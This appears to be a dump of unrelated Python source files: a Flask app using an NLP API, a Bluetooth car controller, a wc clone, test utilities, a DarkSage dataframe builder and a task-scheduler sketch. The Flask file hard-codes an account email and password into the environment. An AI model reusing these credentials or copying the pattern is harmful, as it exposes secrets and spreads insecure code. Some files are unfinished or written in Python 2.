            prereqs_by_course[course] = []  # memoize: proven completable
            return True
        return all(completable(course) for course in range(numCourses))
|
2,961 | d0f2d47a786b85367f96897e7cd8c2ef8c577e2b | import datetime
from flask import Flask, render_template, request
import database
import database1
import database2
import getYoutubeVideoLinks as getYT
import os
# NOTE(review): expert.ai credentials are hard-coded and committed to source —
# move them to environment configuration or a secrets store.
os.environ["EAI_USERNAME"] = 'pitabi1360@pashter.com'
os.environ["EAI_PASSWORD"] = 'Testqwerty1!'
from expertai.nlapi.cloud.client import ExpertAiClient
client = ExpertAiClient()
# Output overall sentiment
app = Flask(__name__)
database.create_tables()
database1.create_table()
database2.create_tablee()
language= 'en'
# NOTE(review): module-level list shared by all requests; it only ever grows.
videos = []
@app.route("/", methods=["GET", "POST"])
def home():
    # On POST: extract the main lemmas of the submitted text via expert.ai,
    # store the entry, and collect YouTube links for every lemma into the
    # module-level `videos` list (shown later on /recommendation).
    if request.method == "POST":
        entry_content = request.form.get("content")
        output = client.specific_resource_analysis(body={"document": {"text": entry_content}}, params={'language': language, 'resource': 'relevants'})
        database2.create_entryss(entry_content, datetime.datetime.today().strftime("%b %d"))
        for lemma in output.main_lemmas:
            print(lemma.value)
            video = getYT.searchVideoForKeyword(lemma.value)
            for indivvideo in video:
                database.create_entry(entry_content, datetime.datetime.today().strftime("%b %d"), indivvideo)
                # NOTE(review): `videos` accumulates across requests and is never cleared.
                videos.append(f'{indivvideo}')
    return render_template("home.html")
@app.route("/feedback", methods=["GET", "POST"])
def feedback():
    # On POST: run expert.ai sentiment analysis over the feedback text and
    # store the entry with its overall sentiment score.
    if request.method == "POST":
        entry_contents = request.form.get("contents")
        output = client.specific_resource_analysis(body={"document": {"text": entry_contents}},params={'language': language, 'resource': 'sentiment'})
        database1.create_entrys(entry_contents, datetime.datetime.today().strftime("%b %d"), output.sentiment.overall)
        print(output.sentiment.overall)
    return render_template("feedback.html")
@app.route("/recommendation", methods=["GET", "POST"])
def recommendation():
    # Show the collected video links alongside the stored entries.
    return render_template('index.html', videos=videos, entries=database.retrieve_entries(), entrie=database2.retrieve_entriee())
@app.route('/negative', methods=["GET", "POST"])
def negative():
    # NOTE(review): passes the same unfiltered entries as /positive — the
    # template presumably filters by the stored sentiment score; confirm.
    return render_template("negative.html", entries=database1.retrieve_entrie())
@app.route('/positive', methods=["GET", "POST"])
def positive():
    # Same data as /negative; the template is expected to select positive entries.
    return render_template("positive.html", entries=database1.retrieve_entrie())
|
2,962 | 605c78795b5a072d330d44a150f26ad410d9d084 | import bluetooth
import serial
import struct
# Definition of Bluetooth rfcomm socket
bd_addr = "98:D3:37:00:8D:39" # The address from the HC-05 sensor
port = 1
# RFCOMM (serial-over-Bluetooth) link to the HC-05 module.
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((bd_addr,port))
# Definition of Serial port
ser = serial.Serial("/dev/ttyACM0", 57600)
def BT_DRIVING():
    """Relay driving commands: forward each byte received over Bluetooth to the serial port.

    Runs forever; one received byte is packed as an unsigned byte ('!B')
    and written straight through to the microcontroller.
    """
    while True:
        data = ord(sock.recv(1024))
        packed = struct.pack('!B', data)
        # BUG FIX: the original wrote undefined name `string` (the variable
        # was `String`), raising NameError on the first iteration.
        ser.write(packed)
def BT_SIGNAL():
    """Block until a signal byte arrives over Bluetooth; return 24 or 25.

    BUG FIXES vs. the original:
    - `elif String = 25:` and `return 25:` were syntax errors;
    - the comparisons tested struct-packed *bytes* against ints, which can
      never be equal.  The raw integer byte value is compared instead.
    """
    while True:
        data = ord(sock.recv(1024))
        if data == 24:
            return 24
        elif data == 25:
            return 25
def _send_code(code):
    """Pack *code* as a single unsigned byte ('!B') and write it to the serial port."""
    ser.write(struct.pack('!B', code))
# Drive/steering command senders, consolidated onto one helper (the original
# repeated the same three pack-and-write lines fifteen times).
# Naming convention inferred from the names and byte codes — confirm against
# the microcontroller firmware:
#   F/H/B = forward / halt / backward, L/R = left / right,
#   the number is the steering angle (S00 = straight ahead).
def FR30():
    _send_code(10)
def FR15():
    _send_code(11)
def FS00():
    _send_code(12)
def FL15():
    _send_code(13)
def FL30():
    _send_code(14)
def HR30():
    _send_code(15)
def HR15():
    _send_code(16)
def HS00():
    _send_code(17)
def HL15():
    _send_code(18)
def HL30():
    _send_code(19)
def BR30():
    _send_code(20)
def BR15():
    _send_code(21)
def BS00():
    _send_code(22)
def BL15():
    _send_code(23)
def BL30():
    _send_code(24)
|
2,963 | e9a4ea69a4bd9b75b8eb8092b140691aab763ae4 | from collections import Counter
from collections import deque
import os
def _count_file(fname):
    """Return (line_count, word_count, char_count) for *fname*.

    Whitespace-only lines are skipped entirely, matching the original
    behaviour: they contribute to none of the three counts.
    """
    numoflines = numofwords = numofchars = 0
    with open(fname, 'r') as f:
        for line in f:
            if not line.isspace():
                numoflines += 1
                numofwords += len(line.split())
                numofchars += len(line)
    return numoflines, numofwords, numofchars


def wc(argval):
    """Emulate `wc`: report line/word/char counts for the file named in *argval*.

    argval mimics sys.argv: ["wc", filename] or ["wc", <flag>, filename].
    A trailing "|" element means output is piped: counts are only written to
    commandoutput.txt, not printed. Fixes over the original: no shadowing of
    the `bool` builtin, no initial `open(..., "r+")` (which crashed with
    FileNotFoundError when commandoutput.txt did not exist yet), the counting
    loop is no longer duplicated, and the handle is always closed.
    """
    piped = "|" in argval
    if piped:
        # Drop the pipe marker so the filename indices below stay correct.
        del argval[len(argval) - 1]
    fmt = "line count= %d, word count= %d, charcount= %d"
    with open("commandoutput.txt", "w") as hf:
        if len(argval) == 2 and os.path.exists(argval[1]):
            filename = argval[1]
            numoflines, numofwords, numofchars = _count_file(filename)
            if not piped:
                print((fmt + ", filename=%s") % (numoflines, numofwords, numofchars, filename))
            hf.write(fmt % (numoflines, numofwords, numofchars))
        elif len(argval) == 3 and os.path.exists(argval[2]):
            filename = argval[2]
            numoflines, numofwords, numofchars = _count_file(filename)
            if piped:
                hf.write(fmt % (numoflines, numofwords, numofchars))
            else:
                # NOTE(review): the original only wrote to commandoutput.txt in
                # the piped case of this branch; preserved as-is.
                print((fmt + ", filename=%s") % (numoflines, numofwords, numofchars, filename))
        else:
            print("source file not found")
|
2,964 | 7e20c61fa30ea93e69a2479e70449638eb52b7bb | #!/usr/bin/env python
"""
Update the expected test outputs and inputs for rsmsummarize and rsmcompare tests.
This script assumes that you have already run `nose2 -s tests` and ran the entire
test suite. By doing so, the output has been generated under the given outputs
directory. And that is what will be used to generate the new expected output
under `tests/data/experiments`.
#############################################################################################
# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #
#############################################################################################
The script works as follows. For each experiment test:
- The script locates the output under the updated outputs directory.
- New and changed files in this directory are copied over to the expected test
output location.
- Old files in the expected test output are deleted.
- Files that are already in the expected test output and have not changed are
left alone.
- Directories that are missing or empty under the updated test outputs are shown.
- For rsmsummarize and rsmcompare tests, the same logic is also applied to input
data. It is assumed that the input experiments are copies of the experiments
from existing tests.
Note: If running this script results in changes to the inputs for rsmcompare
or rsmsummarize tests, you will need to first re-run the tests for those two
tools and then, potentially, run this script again to update their test outputs.
See `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_
for a further explanation of this process.
The script prints a log detailing the changes made for each experiment test.
:author: Nitin Madnani
:author: Anastassia Loukina
:author: Jeremy Biggs
:organization: ETS
"""
import argparse
import re
import sys
from pathlib import Path
from rsmtool.test_utils import FileUpdater
def main():  # noqa: D103
    """Update expected test files from the freshly generated test outputs."""
    # set up an argument parser
    parser = argparse.ArgumentParser(prog="update_test_files.py")
    parser.add_argument(
        "--tests",
        dest="tests_dir",
        required=True,
        help="The path to the existing RSMTool tests directory",
    )
    parser.add_argument(
        "--outputs",
        dest="outputs_dir",
        required=True,
        help="The path to the directory containing the updated test "
        "outputs (usually `test_outputs`)",
    )
    # parse given command line arguments
    args = parser.parse_args()
    # print out a reminder that the user should have run the test suite
    run_test_suite = input("Have you already run the whole test suite? (y/n): ")
    if run_test_suite == "n":
        print("Please run the whole test suite using `nose2 -s tests` before running this script.")
        sys.exit(0)
    elif run_test_suite != "y":
        print("Invalid answer. Exiting.")
        sys.exit(1)
    else:
        print()
    # iterate over the given tests directory and find all files named
    # `test_experiment_*.py` and get their suffixes for use with the
    # FileUpdater object.
    # BUG FIX: glob under the user-supplied --tests directory instead of the
    # hard-coded "tests", which silently produced no suffixes when the script
    # was run from anywhere but the repository root.
    suffixes = [
        re.sub(r"test_experiment_", "", p.stem)
        for p in Path(args.tests_dir).glob("test_experiment_*.py")
    ]
    # instantiate a FileUpdater object
    updater = FileUpdater(
        test_suffixes=suffixes,
        tests_directory=args.tests_dir,
        updated_outputs_directory=args.outputs_dir,
    )
    # run the file updates
    updater.run()
    # now print the report from the updated object
    updater.print_report()
if __name__ == "__main__":
    main()
|
2,965 | 173b8e66ead62e3aa70805e42e06ea05257d5ee2 | class Tool:
def __init__(self, name, weight):
self.name = name
self.weight = weight
def __repr__(self):
return f'Tool({self.name!r},{self.weight})'
tools = [
Tool('수준계', 3.5),
Tool('해머', 1.25),
Tool('스크류드라이버', .5),
Tool('끌', .25)
]
print(repr(tools))
tools.sort(reverse=True, key=lambda x: len(x.name))
print(tools) |
2,966 | 4f91c57ad42759654a87328d5c92de8da14ca5ea | import os
from CTFd.utils.encoding import hexencode
def generate_nonce():
    """Return 32 cryptographically random bytes, hex-encoded, for use as a nonce."""
    random_bytes = os.urandom(32)
    return hexencode(random_bytes)
|
2,967 | a24ab93983546f8ae0fab042c121ac52388e62e8 | users = {1: "Tom", 2: "Bob", 3: "Bill"}
elements = {"Au": "Oltin", "Fe": "Temir", "H": "Vodorod", "O": "Kislorod"} |
2,968 | 1c01fbf7eafd49ada71cb018a62ead5988dcf251 | from prediction_model import PredictionModel
import util.nlp as nlp
import re
class NLPPredictionModel(object):
    """Scores sweetwords by their average per-word NLP score, normalized to probabilities."""

    def getPasswordProbabilities(self, sweetwordList):
        """Return one probability per sweetword, summing to 1.

        Sweetwords containing no letters score 0 (cannot be rated by the NLP
        model). BUG FIX: when every sweetword scored 0 the final division
        raised ZeroDivisionError; fall back to a uniform distribution instead.
        """
        result = []
        for s in sweetwordList:
            words = re.findall(r"[a-zA-Z']+", s)
            if not words:
                result.append(0.0)
            else:
                result.append(sum(nlp.getScore(w) for w in words) / float(len(words)))
        sum_result = sum(result)
        if not sum_result:
            # All-zero scores: no evidence to prefer any candidate.
            return [1.0 / len(result)] * len(result) if result else []
        return [r / float(sum_result) for r in result]
|
2,969 | 30a2e4aa88b286179e2870205e90fab4a7474e12 | #!/usr/bin/env python
# -*-coding:utf-8-*-
__author__ = '李晓波'
from linux import sysinfo
# Dispatch to the matching platform-specific collection/processing function.
def LinuxSysInfo():
    """Collect system information on Linux via the linux.sysinfo module."""
    #print __file__
    return sysinfo.collect()
def WindowsSysInfo():
    """Collect system information on Windows; imported lazily so this module still loads on Linux."""
    from windows import sysinfo as win_sysinfo
    return win_sysinfo.collect()
|
2,970 | a74d27d9e31872100b4f22512abe9de7d9277de7 | # -*- coding: GB18030 -*-
import inspect
import os,sys
import subprocess
from lib.common.utils import *
from lib.common.loger import loger
from lib.common import checker
from lib.common.logreader import LogReader
import shutil
from lib.common.XmlHandler import *
from lib.common.Dict import *
class baseModule(object):
    """Base class for test-framework modules.

    Manages the module's paths (bin/conf/dict/log), allocated ports,
    conf/dict backup-and-restore, downstream-module topology, and the
    notice/WF log check helpers. Concrete modules override the lifecycle
    hooks (start / stop / set_listen_port / build_relation / ...).
    """
    def __init__(self):
        self.sys = Shell_System()
        self.path = None
        # module bin path
        self.bin_path = None
        # module conf path
        self.conf_path = None
        # module dict path
        self.dict_path = None
        # log path
        self.log_path = None
        # ports that have been allocated to this module
        self.port = []
        # how many ports this module needs configured
        self.port_num = 0
        # module name
        self.type = None
        # whether conf should be backed up / restored
        self.conf_bak_flag = False
        # whether dict should be backed up / restored
        self.dict_back_flag = False
        # The attributes below are initialised by each concrete module as needed.
        # notice log file name
        self.ntlogname = None
        # WF (warning/fatal) log file name
        self.wflogname = None
        self.nt_logreader = None
        self.wf_logreader = None
    def add_relation(self, module):
        """
        @note: `module` is an already-constructed instance of another module;
               records the concrete upstream -> downstream relation.
        """
        self.module_rel_set.append(module)
        loger.info("Topology is %s ----> %s",self.type,getattr(module,"type"))
        return 0
    def build_relation(self):
        """
        @note: must be implemented if this module has downstream modules;
               builds the relation between this module and its downstream ones.
        """
        pass
    def get_port(self):
        """
        @note: return the list of ports this module has requested.
        """
        return self.port
    def set_listen_port(self):
        """
        @note: each concrete module writes its listen port into its conf.
        """
        pass
    def start(self):
        """
        @note: start the module.
               Success can be judged via port or process existence:
               checker.check_process_exist(processpath)
               checker.check_port_exist(port)
        """
        pass
    def stop(self):
        """
        @note: stop the module; by default the process is located via self.bin_path.
        """
        # FIX: `<>` is Python-2-only syntax; `!=` behaves identically and is portable.
        if self.bin_path != None and os.path.exists(self.bin_path):
            kill_process(self.bin_path)
            loger.debug("kill process %s"%(self.bin_path))
        else:
            loger.warning("module [%s] has not bin_path!"%(self.type))
    def bak_or_revert_env(self):
        """
        @note: back up or restore according to the backup flags.
               Two items are handled by default: conf and dict.
               If path.robotbak does not exist, back up path;
               - if it does exist, overwrite path from path.robotbak.
        """
        # clean the log directory
        if self.log_path is not None:
            cmd = "rm -rf " + self.log_path
            loger.debug(cmd)
            self.sys.shell(cmd)
        # rename core files so later runs can be told apart
        rename_cores(self.path)
        # back up / restore conf
        if self.conf_bak_flag:
            bak_or_revert(self.conf_path)
        # back up / restore dict
        if self.dict_back_flag:
            bak_or_revert(self.dict_path)
        return 0
    def __conf_op(self, optype, confid, k, v=None):
        """
        @note: wraps the three conf operations (set / get / delete).
               optype: 0 = set, 1 = get, 2 = delete.
               External entry points are set_conf, get_conf and delete_conf.
        """
        if self.path is None:
            raise AssertionError("get modulepath error[%s]"%(self.path))
        path, seg = getconfitem(self.path, self.type, confid)
        if path is None:
            raise AssertionError("set conf error[%s][%s][%s][%s]"%(self.type, confid, k , v))
        conf = UbConfigParser(path, seg)
        if optype == 0:
            conf.set(k , v)
            return
        if optype == 1:
            return conf.get(k)
        if optype == 2:
            conf.delete(k)
            return
    def set_conf(self, confid, k, v):
        """
        @note: set a conf item; confid is the id registered in conf.xml.
        """
        return self.__conf_op(0, confid, str(k), str(v))
    def get_conf(self, confid, k):
        """@note: read a conf item registered under confid."""
        return self.__conf_op(1, confid, str(k))
    def delete_conf(self, confid, k):
        """@note: delete a conf item registered under confid."""
        return self.__conf_op(2, confid, str(k))
    def set_dict(self, dictid, *line_item):
        """
        @note: write dictionary data; each value goes into its own column.
        """
        path, seg = getdictitem(self.type, dictid)
        real_path = os.path.join(self.path, path)
        dicth = DictHandler(real_path, seg)
        dicth.set_dict(line_item)
    def clear_dict(self, dictid):
        """
        @note: clear the dictionary file.
        """
        path, seg = getdictitem(self.type, dictid)
        real_path = os.path.join(self.path, path)
        # BUG FIX: `self` was passed as DictHandler's first positional argument
        # here (unlike set_dict above), shifting real_path/seg into the wrong
        # parameter slots.
        dicth = DictHandler(real_path, seg)
        dicth.clear_dict()
    # The interfaces below are test helpers.
    def check_notice_log_has(self, regex):
        """
        @note: check whether the notice log contains a match of `regex`.
        return: True if present, otherwise False.
        """
        if self.nt_logreader == None:
            nt_log_path = os.path.join(self.log_path, self.ntlogname)
            self.nt_logreader = LogReader(nt_log_path)
        return checker.check_log_contain(self.nt_logreader,regex)
    def check_wf_log_has(self, regex):
        """
        @note: check whether the WF log contains a match of `regex`.
        return: True if present, otherwise False.
        """
        if self.wf_logreader == None:
            wf_log_path = os.path.join(self.log_path, self.wflogname)
            self.wf_logreader = LogReader(wf_log_path)
        return checker.check_log_contain(self.wf_logreader, regex)
    def check_fatal(self):
        """
        @note: check whether the WF log contains FATAL lines.
        return: True if FATAL found, otherwise False.
        """
        regex="^FATAL.*"
        return self.check_wf_log_has(regex)
    def set_req(self, reqresjs=None, *agrs):
        """
        @note: set the request (note: this is not a dict setting).
        """
        pass
    def set_res(self):
        """
        @note: set the response.
        BUG FIX: `self` was missing from the signature, so calling the method
        on an instance raised TypeError.
        """
        pass
    def common_check(self):
        """
        Generic common-check entry point. Takes no arguments;
        typically used to detect FATAL lines and core files.
        """
        # dump the tail of both logs for diagnosis
        if self.nt_logreader == None:
            nt_log_path = os.path.join(self.log_path, self.ntlogname)
            self.nt_logreader = LogReader(nt_log_path)
        if self.wf_logreader == None:
            wf_log_path = os.path.join(self.log_path, self.wflogname)
            self.wf_logreader = LogReader(wf_log_path)
        loger.diagnose("Module[%s] wf logs:\n%s"%(self.type, self.wf_logreader.read_fatal_and_last_lines(10)))
        loger.diagnose("Module[%s] notice logs:\n%s"%(self.type, self.nt_logreader.read_last_lines(10)))
        # check for core files
        log_cores(self.path)
        # check for FATAL lines
        if self.check_fatal():
            raise AssertionError("There FATAL in module[%s]"%(self.type))
    def check(self, checkjs=None):
        """
        @note: check entry point; implemented by concrete modules.
        """
        pass
    def reqdata(self):
        '''
        @note: build each module's request as JSON and store it on the instance.
        '''
        pass
    def get_used_port(self):
        """
        @note: list the ports already in use on this module's host.
        """
        used_port_list = self.sys.shell("netstat -na 2>/dev/null|grep \":\"|awk -F \"[ :]\" '{print $17}'",output = "true")[1].splitlines()
        return used_port_list
def test_system():
    "Unit test: exercises Shell_System.shell() success, failure, and output capture."
    npatSys = Shell_System()
    npatSys.shell("echo '12345' > a.txt")
    npatSys.shell("rm b.txt")
    npatSys.shell("cat a.txt b.txt", output = True)
    npatSys.shell("ttt")
    npatSys.shell("ttt", output = True)
    used_port_list = npatSys.shell("netstat -na 2>/dev/null|grep \":\"|awk -F \"[ :]\" '{print $17}'",output = "true")[1].splitlines()
    print used_port_list
if __name__ == '__main__':
    # Smoke check: construct the base module and show the shell helper's type.
    mm = baseModule()
    print type(mm.sys)
|
2,971 | 0d565c9f92a60d25f28c903c0a27e7b93d547a4f | #Create Pandas dataframe from the DarkSage output G['']
import pandas as pd
import numpy as np
# This is a way to converte multi dimensional data into pd.Series and then load these into the pandas dataframe
def _object_series(column):
    """Wrap each row of a multi-dimensional DarkSage column as one object-dtype Series element.

    pandas cannot hold a 2-D column directly as one DataFrame column, so each
    row is stored as a single object. This helper replaces fourteen copies of
    the same append-loop from the original script; the produced Series are
    element-for-element identical.
    """
    return pd.Series(list(column), dtype=np.dtype("object"))


# NOTE(review): `G` (the raw DarkSage output record array) must already be
# defined by the calling notebook/loader before this script runs.
Pos_df = _object_series(G['Pos'])
Vel_df = _object_series(G['Vel'])
Spin_df = _object_series(G['Spin'])
Disc_df = _object_series(G['DiscRadii'])
Disc_gas_df = _object_series(G['DiscGas'])
Disc_stars_df = _object_series(G['DiscStars'])
SpinStars_df = _object_series(G['SpinStars'])
SpinGas_df = _object_series(G['SpinGas'])
SpinClassicalBulge_df = _object_series(G['SpinClassicalBulge'])
DiscHI_df = _object_series(G['DiscHI'])
DiscH2_df = _object_series(G['DiscH2'])
DiscSFR_df = _object_series(G['DiscSFR'])
DiscGasMetals_df = _object_series(G['DiscGasMetals'])
DiscStarsMetals_df = _object_series(G['DiscStarsMetals'])

######################################
# Column order is preserved exactly as in the original literal dict.
DS = pd.DataFrame({'Type': G['Type'],
                   'GalaxyIndex': G['GalaxyIndex'],
                   'HaloIndex': G['HaloIndex'],
                   'SimulationHaloIndex': G['SimulationHaloIndex'],
                   'TreeIndex': G['TreeIndex'],
                   'SnapNum': G['SnapNum'],
                   'CentralGalaxyIndex': G['CentralGalaxyIndex'],
                   'CentralMvir': G['CentralMvir'],
                   'mergeType': G['mergeType'],
                   'mergeIntoID': G['mergeIntoID'],
                   'mergeIntoSnapNum': G['mergeIntoSnapNum'],
                   'dT': G['dT'],
                   'Pos': Pos_df,
                   'Vel': Vel_df,
                   'Spin': Spin_df,
                   'Len': G['Len'],
                   'LenMax': G['LenMax'],
                   'Mvir': G['Mvir'],
                   'Rvir': G['Rvir'],
                   'Vvir': G['Vvir'],
                   'Vmax': G['Vmax'],
                   'VelDisp': G['VelDisp'],
                   'DiscRadii': Disc_df,
                   'ColdGas': G['ColdGas'],
                   'StellarMass': G['StellarMass'],
                   'MergerBulgeMass': G['MergerBulgeMass'],
                   'InstabilityBulgeMass': G['InstabilityBulgeMass'],
                   'HotGas': G['HotGas'],
                   'EjectedMass': G['EjectedMass'],
                   'BlackHoleMass': G['BlackHoleMass'],
                   'IntraClusterStars': G['IntraClusterStars'],
                   'DiscGas': Disc_gas_df,
                   'DiscStars': Disc_stars_df,
                   'SpinStars': SpinStars_df,
                   'SpinGas': SpinGas_df,
                   'SpinClassicalBulge': SpinClassicalBulge_df,
                   'StarsInSitu': G['StarsInSitu'],
                   'StarsInstability': G['StarsInstability'],
                   'StarsMergeBurst': G['StarsMergeBurst'],
                   'DiscHI': DiscHI_df,
                   'DiscH2': DiscH2_df,
                   'DiscSFR': DiscSFR_df,
                   'MetalsColdGas': G['MetalsColdGas'],
                   'MetalsStellarMass': G['MetalsStellarMass'],
                   'ClassicalMetalsBulgeMass': G['ClassicalMetalsBulgeMass'],
                   'SecularMetalsBulgeMass': G['SecularMetalsBulgeMass'],
                   'MetalsHotGas': G['MetalsHotGas'],
                   'MetalsEjectedMass': G['MetalsEjectedMass'],
                   'MetalsIntraClusterStars': G['MetalsIntraClusterStars'],
                   'DiscGasMetals': DiscGasMetals_df,
                   'DiscStarsMetals': DiscStarsMetals_df,
                   'SfrFromH2': G['SfrFromH2'],
                   'SfrInstab': G['SfrInstab'],
                   'SfrMergeBurst': G['SfrMergeBurst'],
                   'SfrDiskZ': G['SfrDiskZ'],
                   'SfrBulgeZ': G['SfrBulgeZ'],
                   'DiskScaleRadius': G['DiskScaleRadius'],
                   'CoolScaleRadius': G['CoolScaleRadius'],
                   'StellarDiscScaleRadius': G['StellarDiscScaleRadius'],
                   'Cooling': G['Cooling'],
                   'Heating': G['Heating'],
                   'LastMajorMerger': G['LastMajorMerger'],
                   'LastMinorMerger': G['LastMinorMerger'],
                   'OutflowRate': G['OutflowRate'],
                   'infallMvir': G['infallMvir'],
                   'infallVvir': G['infallVvir'],
                   'infallVmax': G['infallVmax']})
|
2,972 | c581d9714681e22c75b1eeb866ea300e87b883f1 | def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = r'(.*\.)?(.*\.)(.*)' # Eg: (www.)(google.)(com)
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
# sort by domain name and then everything left of
# Eg: google, com, www
domain_values = (
domain_search.group(2),
domain_search.group(3),
domain_search.group(1)
)
key = '%s%s%s' % domain_values
else:
# no host portion, just return the domain name
key = domain
return(key)
# Demo: sort mixed hosts/domains so hosts group under their registered domain.
domains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']
print('before: %s' % repr(domains))
domains.sort(key=domain_sort_key)
print('after: %s' % repr(domains))
|
2,973 | a29cf9e7006d52cea8f5ccdcbc2087983ffa3ef3 | from modules.core.logging.logging_service import LoggingService
from modules.core.logging.models import LogLevel, LogEntry
import pytest
from .setup import register_test_db, register_test_injections, teardown,\
drop_all_collections
@pytest.fixture(autouse=True)
def setup():
    """Register the test database and DI bindings before every test in this module."""
    register_test_db()
    register_test_injections()
def test_mongo_logging_client_persists_log():
    """
    Test to see if the mongodb client logger
    can persist a log entry to the database
    """
    error_message = "This is a test message."
    logging_service = LoggingService(console_output=True)
    persisted = logging_service.log(LogEntry(LogLevel.ERROR, __name__, error_message))
    # Exercise the remaining levels too; only the first result is asserted.
    for level in (LogLevel.WARN, LogLevel.INFO, LogLevel.DEBUG):
        logging_service.log(LogEntry(level, __name__, error_message))
    assert persisted.message == error_message
def tests_teardown():
    """Drop every test collection, then tear down the test environment."""
    drop_all_collections()
    teardown()
|
2,974 | 19888c998e8787533e84413272da1183f16fcdb1 | # 8-7. Album: Write a function called make_album() that builds a dictionary
# describing a music album. The function should take in an artist name and an
# album title, and it should return a dictionary containing these two pieces
# of information. Use the function to make three dictionaries representing
# different albums. Print each return value to show that the dictionaries are
# storing the album information correctly. Use None to add an optional
# parameter to make_album() that allows you to store the number of songs on an
# album. If the calling line includes a value for the number of songs, add
# that value to the album’s dictionary. Make at least one new function call
# that includes the number of songs on an album.
# PART ONE
def make_album(artist_name, album_title):
    """Build a dictionary describing a music album"""
    return {
        'Artist': artist_name.title(),
        'Album': album_title.title(),
    }
print("Here's Part One:")
cardi = make_album('cardi b', 'invasion of privacy')
print(cardi)
jhene = make_album('jhene aiko', 'souled out')
print(jhene)
lennon = make_album('lennon stella', 'three. two. one.')
print(lennon)
# PART TWO
def make_album_two(artist_name, album_title, number_of_songs= None):
    """Build a dictionary describing a music album.

    number_of_songs is optional; when provided it is stored under
    'Number of Songs'. BUG FIX: the original tested `if number_of_songs:`
    (truthiness), which silently dropped a legitimate count of 0; None is
    the documented "not provided" sentinel, so test identity against it.
    """
    music_album = {'Artist': artist_name.title(),
                   'Album': album_title.title()}
    if number_of_songs is not None:
        music_album['Number of Songs'] = number_of_songs
    return music_album
print("\nHere's Part Two:")
cardi = make_album_two('cardi b', 'invasion of privacy')
print(cardi)
jhene = make_album_two('jhene aiko', 'souled out')
print(jhene)
lennon = make_album_two('lennon stella', 'three. two. one.', 13)
print(lennon)
|
2,975 | e40b34f0ee51cc14615c6225a7676929e6d2876a | #!/usr/bin/env python3
import datetime, random
class State(object):
    """Base class for task lifecycle states; str() yields the state's name."""

    def __init__(self, name):
        self.name = name

    def __str__(self):
        return self.name
class State_New(State):
    """The task has been created but not yet started."""

    def __init__(self):
        super().__init__("New")
class State_Underway(State):
    """The task is actively being worked on."""

    def __init__(self):
        super().__init__("Underway")
class State_Paused(State):
    """The task is temporarily blocked or on hold."""

    def __init__(self):
        super().__init__("Paused")
class State_Completed(State):
    """The task is finished."""

    def __init__(self):
        super().__init__("Completed")
class TaskMan(object):
    """Container for the set of tasks being managed."""

    def __init__(self):
        # No tasks yet; callers append Task objects directly.
        self.tasks = []
class Resource(object):
    """A worker/resource that can be assigned to tasks.

    Ordering is by available_count, so the least-contended resource sorts first.
    """
    def __init__(self, name):
        self.name = name
        # the available_count is how many tasks this resource is available for.
        self.available_count = 0
        # The assigned count is how many times this resource has been used.
        # For sorting, sort based on available+assigned, unless there are
        # multiple resources at the same value
        self.assigned_count = 0

    def __lt__(self, other):
        return self.available_count < other.available_count

    def __cmp__(self, other):
        # BUG FIX: cmp() was removed in Python 3 (this file targets python3 per
        # its shebang), so any explicit __cmp__ call raised NameError. Emulate
        # the old -1/0/1 contract without it. (Python 3 comparison operators
        # ignore __cmp__; only __lt__ above is used by sort().)
        return (self.available_count > other.available_count) - (
            self.available_count < other.available_count)

    def __str__(self):
        return "Name: %s, weight: %s" % (self.name, self.available_count)
class ResourceGroup(object):
    """An unordered collection of resources that could serve a task."""

    def __init__(self, *resources):
        self.resources = set(resources)

    def __str__(self):
        return ", ".join(resource.name for resource in self.resources)
        #return str(self.resources)
class ResourceManager(object):
    """Registry of every known resource; str() lists them one per line."""

    def __init__(self):
        self.resources = set()

    def add(self, r):
        self.resources.add(r)

    def __str__(self):
        return "\n".join(str(res) for res in self.resources)
class Task(object):
    """A unit of work with a duration, a required worker count, and a candidate resource group."""

    # Shared state singletons: every Task references these same four instances.
    s_new = State_New()
    s_underway = State_Underway()
    s_paused = State_Paused()
    s_completed = State_Completed()
    def __init__(self, name, duration=4, numworkers=1, resource_group=None):
        self.work_units = [] # work units applied so far
        self.name = name
        self.predecessors = []
        self.successors = []
        self.state = self.s_new
        self.resource_group = resource_group
        self.duration = duration
        self.numworkers = numworkers
        self.start_offset = 0
        # hard assigned resources are those designated by the user, and are not
        # subject to change by the program.
        self.hard_assigned_resources = []
        # auto_assigned resources are those designated by the program and may be
        # changed at any time until the task has begun. Once the task has begun,
        # the resource becomes hard_assigned and must be changed manually if it
        # needs to be changed.
        self.auto_assigned_resources = []
        # A task may be waiting to start, underway, paused or completed.
        # Each state change could be accompanied by a comment. If a task is
        # paused because it is waiting for either another resource, the
        # completion of another task, or some 3rd party action, that should be
        # noted in a comment.
    # def assign(self):
    #     self.resource_group.sort()
    #     for x in range(self.numworkers):
    #         self.auto_assigned_resources.append(self.resource_group.resources[x])
    def avail(self, time, resource_group):
        """
        Build a set of resources who are available for a given time. It might
        make more sense to work based on a given restricted resource set.
        """
        # NOTE(review): unfinished stub — `a` is built but never filled or
        # returned, so callers always receive None.
        a = set()
        for r in self.resource_group.resources:
            pass
    def __str__(self):
        # Render an indented timeline bar (one '-' per duration unit, shifted by
        # start_offset spaces), followed by the assigned resources if any,
        # otherwise the candidate resource group.
        r = []
        #r.append("Task: %s" % self.name)
        #r.append("  State: %s" % self.state)
        #r.append("  Hard Resources: %s" % str(self.hard_assigned_resources))
        #r.append("  Auto Resources: %s" % str(self.auto_assigned_resources))
        #r.append("  Resource Group: %s" % str(self.resource_group))
        if self.auto_assigned_resources:
            r.append("%s%s %s" % (self.start_offset*" ", str("-"*self.duration),
                                  str(self.auto_assigned_resources)))
        else:
            r.append("%s%s %s" % (self.start_offset*" ", str("-"*self.duration),
                                  str(self.resource_group)))
            #str(datetime.timedelta(minutes=self.duration*15)))
        return "\n".join(r)
def flatten(tasks):
    """Lay out *tasks* on a shared timeline, assigning resources as they free up.

    NOTE(review): unfinished — `needs_assignment` is never set to True, so the
    while loop always exits after one pass, and Task.avail() is a stub that
    returns None; `avail_resources` is computed but unused.
    """
    # Because resources may be shared across multiple projects, when flattening
    # you need to take that into account.
    # I think actually that flattening a set of projects simultaneously would
    # probably be a good thing. This would allow us to maximize the efficiency
    # of resource allocation.
    # This won't always be possible, some people will have outside committments
